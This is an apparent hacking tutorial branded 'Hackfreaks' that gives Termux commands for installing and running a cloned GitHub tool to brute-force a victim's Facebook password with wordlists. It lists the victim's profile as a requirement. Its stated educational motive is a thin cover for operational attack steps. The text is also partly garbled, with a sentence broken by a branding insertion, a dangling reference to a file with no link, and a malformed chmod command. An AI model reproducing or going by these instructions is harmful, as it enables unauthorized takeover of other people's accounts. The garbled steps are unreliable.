◾ What is brute force? ◾
Brute force in the field of computing is a hacking method in which the attacker tries to decipher the password of his victim by means of a combination of passwords generated with information collected from Brought to you by Hackfreaks.
◾ What is facebook? ◾
Facebook is a free social network that allows users to interact and share content with their friends through the internet.
At present, facebook is the most used social network due to the ease and "privacy" that it offers us, however, despite the good security that this social network has, it is still vulnerable to certain computer attacks, Brought to you by hackfreaks official. it is That is why I have decided to share the knowledge of how to carry out an attack called "brute force" to this social network.
I do this in order to publicize this type of computer attack and avoid being a victim of it.
REQUIREMENTS
◾ Termux application
◾ Chrome browser
◾ Facebook Profile (Victim)
The first thing we will do is update the termux repositories with the command:
apt update && apt upgrade -y
Next we proceed to give storage permissions to termux with the command:
termux-setup-storage
Once the permissions have been granted, we are going to install the requirements of the tool that we will use for brute force with the command:
pkg install git openssh php python python2 -y; pip2 install mechanize; pip install --upgrade pip
Now that we have the requirements installed, we are going to clone our tool with the command:
⭕ git clone
https://github.com/perjayro/Facebook_brute.git
Once the tool is cloned, we open the following link with the Chrome browser and download the file (wortex.py)
apt update && apt upgrade -y
termux-setup-storage
apt install -y python
apt install -y python2
apt install -y python2-dev
apt install pip2
pip2 install mechanize
apt install -y git
⭕git clone
https://github.com/perjayro/Facebook_brute.git
cd Facebook_brute
chmod + x brute.py
python2 brute.py
make passlist.
PASSWORD
pass.txt
pass1.txt
pass2.txt
pass3.txt